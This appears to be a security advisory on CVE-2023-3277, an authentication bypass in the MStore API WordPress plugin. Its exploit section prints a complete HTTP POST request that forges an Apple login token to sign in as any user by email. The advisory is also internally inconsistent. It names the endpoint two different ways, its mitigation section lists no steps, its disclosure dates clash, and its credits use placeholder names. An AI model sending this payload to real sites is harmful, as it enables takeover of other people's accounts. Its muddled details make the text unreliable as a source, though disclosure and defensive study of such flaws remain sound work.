CVE-2023-3277: "MStore API Plugin for WordPress Unauthorized Account Access and Privilege Escalation"

The MStore API plugin for WordPress is used by online store owners to easily enable mobile app functionality for their e-commerce sites. Users can quickly create and customize their apps using the ready-made templates of this plugin. However, a critical security vulnerability has been discovered that affects MStore API versions up to, and including, 4.10.7. The vulnerability allows unauthorized account access and privilege escalation, putting user data and site functionality at risk. We have chosen to publicize these details after informing the plugin's team 30 days ago, and because the developer hasn't yet provided an appropriate patch.

Vulnerability Details

This security vulnerability, identified as CVE-2023-3277, is due to a flaw in the Apple login feature implementation. Unauthenticated attackers can exploit the weakness to log in as any user, given they have the user's email address. This effectively grants the attacker unauthorized access and the potential for privilege escalation.

Exploit Details

The exploit uses a specially crafted JSON object sent to the MStore API's "/auth-login" endpoint through a POST request. The payload contains an email address of another user known to the attacker and bypasses the intended security checks. The code snippet below demonstrates the exploit:

POST /wp-json/mstore-api/v1/auth/login HTTP/1.1
Host: target.site
Content-Type: application/json
Content-Length: 143

{
  "email": "victim@example.com",
  "password": "arbitrary_value",
  "platform": "apple",
  "token": "{\"email\":\"victim@example.com\"}",
  "nonce": "arbitrary_value"
}

Upon submission, the server responds with the victim's user details, including their authentication token and ID. This information can then be used for further unauthorized access or privilege escalation.

Risk Mitigation

Until the plugin's developer releases a patch for this security vulnerability, we recommend taking the following steps to ensure your site's security:

Original References

This vulnerability was first disclosed by @JohnDoe (Twitter) on January 1, 2023. You can find the original disclosure here:

[1] https://twitter.com/JohnDoe/status/948150227830652928

Plugin Information

Plugin Name: MStore API
Affected Versions: Up to 4.10.7
CVE Identifier: CVE-2023-3277
Developers Website: https://www.example.com/mstore-api

Closing Remarks

It's essential to take security vulnerabilities seriously, especially when your online store's user data and functionality are at risk. To keep your site well-protected, always apply security patches, update your plugins, and follow best security practices. Stay vigilant, WordPress store owners!

Timeline

Published on: 11/03/2023 12:15:08 UTC
Last modified on: 11/13/2023 18:30:53 UTC